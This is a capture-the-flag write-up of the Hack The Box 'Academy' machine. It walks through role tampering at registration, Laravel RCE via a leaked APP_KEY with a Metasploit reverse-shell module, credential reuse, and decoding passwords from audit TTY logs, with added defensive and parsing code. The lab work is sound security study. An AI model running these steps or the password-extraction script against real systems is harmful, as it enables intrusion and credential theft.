HTB: Academy Box
Room Academy on Hack The Box
Let's start with an nmap scan: nmap -p- -T4 -A -v 10.10.10.215
Opening 10.10.10.215:80 returns a 302 that redirects us to academy.htb, which does not resolve.
We added the line 10.10.10.215 academy.htb to /etc/hosts so the hostname resolves, and on reloading 10.10.10.215:80 we are greeted with a login page.
Let's register a test account first: n00bx101:123456
On login we are shown the following page:
Rabbit hole :') Heading back to the registration form, the page source contains a hidden field named roleid. The server trusts whatever value the client sends, so we change it to 1 and register a second account, tera:12345, which gets the admin role.
Now we log in at academy.htb/admin.php with the credentials we just made.
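The roleid bug in server-side terms, as an added example that is not the box's own code: a registration handler that copies the submitted hidden field into the new account (the mass-assignment pattern that made tera an admin) next to a hardened handler that builds the account from an allowlist and assigns the role itself. Apart from roleid, the field and function names are hypothetical.

```python
# Added example, not the box's source: the registration flaw the post
# exploits (a hidden roleid field copied straight into the new account)
# next to a handler that assigns the role server-side. Field and
# function names other than roleid are hypothetical.
ROLE_USER = 0
ROLE_ADMIN = 1

# Fields a registration form is allowed to set. Anything role-related is
# deliberately absent: privilege is decided by the server, never the client.
ALLOWED_FIELDS = frozenset({"username", "password"})


def register_vulnerable(form: dict) -> dict:
    """Trusts the submitted roleid, so a tampered hidden field yields an admin."""
    return {
        "username": form["username"],
        "password": form["password"],
        "roleid": int(form.get("roleid", ROLE_USER)),
    }


def register_hardened(form: dict, *, strict: bool = True) -> dict:
    """Builds the account from an allowlist of fields and fixes roleid = ROLE_USER.

    With strict=True an unexpected field (roleid, is_admin, ...) is rejected
    outright; that is a tamper signal worth logging. With strict=False the
    extra fields are silently dropped, which still never grants a role.
    """
    missing = ALLOWED_FIELDS - set(form)
    if missing:
        raise ValueError(f"missing registration fields: {sorted(missing)}")
    unexpected = set(form) - ALLOWED_FIELDS
    if unexpected and strict:
        raise ValueError(f"unexpected registration fields: {sorted(unexpected)}")
    user = {field: form[field] for field in ALLOWED_FIELDS}
    user["roleid"] = ROLE_USER  # the only place a role is ever set at signup
    return user


def admin_login_allowed(user: dict) -> bool:
    """The check an admin page should perform before serving anything."""
    return user.get("roleid") == ROLE_ADMIN


def rejects_tampering(form: dict) -> bool:
    """True if the strict handler refuses a form carrying non-allowlisted fields."""
    try:
        register_hardened(form, strict=True)
    except ValueError:
        return True
    return False


def demo() -> dict:
    # The tampered request from the post: hidden roleid flipped from 0 to 1.
    tampered = {"username": "tera", "password": "12345", "roleid": "1"}
    return {
        "vulnerable_is_admin": admin_login_allowed(register_vulnerable(tampered)),
        "hardened_is_admin": admin_login_allowed(register_hardened(tampered, strict=False)),
        "strict_rejects": rejects_tampering(tampered),
    }


if __name__ == "__main__":
    print(demo())
```

The same rule applies to ORMs with "fill from request" helpers: maintain an explicit allowlist of fillable columns and keep role, is_admin and similar columns out of it.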
The admin panel lists tasks; the last one is still pending and names the dev-staging-01.academy.htb vhost, so let's add that to /etc/hosts as well.
Opening dev-staging-01.academy.htb greets us with a Laravel error page that dumps the application's environment, including its APP_KEY:
So after some poking around we know the app is built on Laravel, and the staging vhost has leaked the key that protects its cookies.
Searching for Laravel exploits lands us on an RCE: vulnerable Laravel versions (before 5.6.30, CVE-2018-15133) decrypt the X-XSRF-TOKEN cookie with APP_KEY and unserialize the result, so anyone holding the leaked key can forge a cookie that carries a PHP object chain. Metasploit has a module for it, and the only extra thing it needs is the APP_KEY we just saw.
msf6 > search laravel

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   APP_KEY                     no        The base64 encoded APP_KEY string from the .env file
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to target webapp
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set LHOST 10.10.15.5
LHOST => 10.10.15.5
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
VHOST => dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set RHOST 10.10.10.215
RHOST => 10.10.10.215
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
Running the exploit gives us a shell on the machine. (VHOST matters here: the vulnerable staging app only answers for dev-staging-01.academy.htb, and the APP_KEY must be the one that app actually uses, or the forged cookie fails its MAC check and nothing happens.)
Navigating around we can see the users at:
and we are logged in as
After some manual enumeration I found a .env file for the web application.
Reading it reveals a database password.
Credentials tend to get reused, so we try it against the local users by trial and error and it works for cry0l1t3: cry0l1t3:mySup3rP4s5w0rd!!
Now we can read user.txt in cry0l1t3's home directory to get the user flag.
In /var/log/audit the audit logs contain TTY records: the keystrokes typed in a session are stored hex-encoded in the data field, so anything typed at a password prompt ends up on disk.
Hex-decoding that data (not decrypting, there is no key involved) gave the password mrb3n_Ac@d3my!.
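The decoding step above, written out as an added example (not part of the original post) over a constructed sample of audit.log records in the real TTY record format: it pulls the hex data= field out of each type=TTY record, renders control keys so edited input stays readable, and collects the lines typed into programs that prompt for passwords. The sample lines, timestamps and PIDs are made up; the decoded password is the one from the box.

```python
import re

# Constructed sample of Linux audit records in /var/log/audit/audit.log
# format (not copied from the box). With pam_tty_audit enabled, type=TTY
# records carry every keystroke of the session as uppercase hex in data=,
# which is how a password typed at a su prompt ends up on disk.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=1002 ses=7 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199301.114:85): tty pid=2522 uid=1002 auid=1002 ses=7 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=USER_AUTH msg=audit(1597199301.120:86): pid=2522 uid=1002 auid=1002 ses=7 msg='op=PAM:authentication acct="mrb3n" exe="/usr/bin/su" res=success'
type=TTY msg=audit(1597199305.002:87): tty pid=2522 uid=0 auid=1002 ses=7 major=4 minor=1 comm="bash" data=6C73207F7F7F696420
"""

# comm= names the program reading the terminal; data= is the hex keystroke buffer.
TTY_RECORD_RE = re.compile(
    r'^type=TTY\b.*?\bcomm="(?P<comm>[^"]*)".*?\bdata=(?P<hex>[0-9A-Fa-f]*)'
)

# Programs whose terminal input is, at some point, a password prompt.
PASSWORD_PROMPT_COMMANDS = frozenset({"su", "sudo", "passwd", "ssh"})


def render_keystrokes(raw: bytes) -> str:
    """Render a keystroke buffer for display, keeping control keys visible.

    Terminal input contains control bytes (backspace 0x7F, ^C, escape
    sequences for arrow keys) that a plain .decode() would hide or mangle;
    caret notation keeps them readable so an edited password can be
    reconstructed by hand.
    """
    out = []
    for b in raw:
        if b == 0x7F:
            out.append("^?")  # DEL, what most terminals send for backspace
        elif b < 0x20 and b not in (0x09, 0x0A):
            out.append("^" + chr(b + 0x40))  # ^C, ^[ (escape), ...
        else:
            out.append(chr(b))
    return "".join(out)


def parse_tty_records(log_text: str) -> list[tuple[str, str]]:
    """Return (comm, rendered keystrokes) for every type=TTY record in the log."""
    records = []
    for line in log_text.splitlines():
        match = TTY_RECORD_RE.match(line)
        if not match:
            continue  # other record types (USER_AUTH, SYSCALL, ...) are skipped
        try:
            raw = bytes.fromhex(match.group("hex"))
        except ValueError:
            raw = b"<malformed hex>"  # truncated line: keep going, flag it
        records.append((match.group("comm"), render_keystrokes(raw)))
    return records


def password_candidates(log_text: str) -> list[str]:
    """Lines typed into su/sudo/passwd/ssh, i.e. likely passwords.

    Each Enter press ends a line, so one record may hold several entries.
    """
    candidates = []
    for comm, typed in parse_tty_records(log_text):
        if comm not in PASSWORD_PROMPT_COMMANDS:
            continue
        candidates.extend(entry for entry in typed.split("\n") if entry)
    return candidates


if __name__ == "__main__":
    for comm, typed in parse_tty_records(SAMPLE_AUDIT_LOG):
        print(f"{comm:>6}: {typed!r}")
    print("password candidates:", password_candidates(SAMPLE_AUDIT_LOG))
```

On a box with the audit userspace tools installed, aureport --tty -i does this decoding for you; the script is for when you only have the raw file. From the defender's side, TTY records for su or sudo are a finding in themselves: pam_tty_audit should not be logging password input (its log_passwd option exists for exactly this reason), and the audit log must not be readable by ordinary users.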
Use mrb3n:mrb3n_Ac@d3my! to switch to mrb3n.
sudo -l shows that mrb3n can run a binary as root.
GTFOBins (https://gtfobins.github.io/) to the rescue: its entry for that binary gives the sudo escalation to a root shell.
This is my first box pwned completely on HTB and I want to thank the HTB Discord community for helping me out when I needed it the most. I will try harder and pwn more boxes in the future :) . Feel free to suggest changes if I have made any mistakes.
“Thanks for reading!!”